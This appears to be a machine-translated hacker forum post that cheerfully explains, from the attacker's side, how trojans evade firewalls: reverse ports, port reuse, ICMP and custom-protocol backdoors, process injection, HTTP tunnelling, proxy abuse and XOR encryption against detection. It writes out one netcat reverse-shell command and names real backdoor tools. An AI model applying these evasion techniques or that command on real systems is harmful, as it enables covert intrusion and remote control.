How does the Trojan cross your firewall?

Network is not peaceful, who will be on the internet to put up a firewall to protect the network attacks, this is not to the survival of our Trojan has brought great challenges?

Natural selection, survival of the fittest, hmm ... If you want to survive, you must wear walls! Bypass Firewall:

1. The first is no Firewall (allow local listener basically any port), no firewall? (This is not nonsense?)

To deal with this kind of machine is good to do, any horse generally representative Radmin (in fact, it is not a horse, with more people, it becomes a horse, innocent)

RDP 3389/tcp (Remote Desktop, it's not a horse, but you don't, who else?)

2. Port filtering (only allow external connection specific port, that is, external to a specific port to initiate a SYN connection request to be accepted, so that three times to shake hands, establish a connection, or the firewall discarded packets, can not complete the handshake, can not establish a connection, that is, the Trojan can not open a port

While, outsmart.:

You don't let me even you, I let you even I chant, bounce Port Technology was born (the general firewall on the local SYN connection request does not intercept)

Use tool Netcat to puncture this firewall:

NC-E cmd.exe remote IP remote monitor port

Subsequently, Port Multiplexing technology also appeared, the reuse of firewall open ports: such as 80,21,445

Typical backdoor like Hkdoor,ntrookit (the author is Chinese Yyt_hac)

There is also the use of unwarranted port protocols for communication, such as using ICMP packets (ping is the echo request of the exploited ICMP protocol and the Echo reply probe host survives)

Typical such as Pingdoor (ping because of the use of ICMP packets, the port is not open, port filtering is helpless, but ICMP has no error control, so this backdoor transmission characteristics are not ideal, unless you add error control)

More cattle, is simply put aside the TCP/IP protocol, Trojan custom protocol to communicate, how can you firewall me? haha

A typical ntrootkit uses a custom protocol technique.

3. Application filtering. (only specific programs are allowed to access the network)

Trojan also unwilling to do, they can not access the network, had to be dependant on:

Process Insertion technology was born, usually firewall to allow Iexplore.exe,explore.exe,svchost.exe,services.exe and other programs to access the network, so the Trojan is staring at these programs. Insert ... Insert and Reinsert

Now the remote control is generally inserted into the process, one is hidden (no process of their own), the second is through the wall. Typically such as Bits.dll (replace system service bits, insert svchost.exe) and Gray pigeon/pcshare (default insert Iexplorer.exe browser process) .

4. Protocol screening.

(for example, only 80 ports are allowed through the HTTP protocol, so that the backdoor of those port multiplexing does not use the HTTP protocol, unfortunately blocked by firewalls.):-)

What to do? Sneak, Digging Tunnels: Http-tunnel (http tunnel) The Trojan traffic is encapsulated into an HTTP datagram for transmission.

There are pcshare using this technique (using bidirectional HTTP Tunnel transport)

5.IP filtering, is generally divided into local, local area network, WAN three levels, but the Trojan is not a vegetarian, some Trojans have begun to intelligent:

For example, can not connect to the hacker host or springboard, search the local agent settings, such as IE proxy settings, and then agent out!

Can imagine the Peer-to-peer form of the horse will soon become possible, so the difference between the Trojan and zombie network is even smaller OH

6. Now many firewalls can detect the transmission of sensitive information, such as user password, so anti-IDs, anti-automatic analysis, which has become a high-level trojan to consider things, in other words, to protect the security and secrecy of hacker control. The typical solution is to take encryption measures, such as the simplest way to deal with IDs detection, XOR exclusive or encrypted.

But now the wall is certainly not the separation of the above technology, but there must be a number of technologies at the same time.

At the same time, comprehensive utilization of the above confrontation technology Trojan is not uncommon.

The Trojan Horse and the protective wall are always a pair of contradictions, struggle with each other and develop with each other. hehe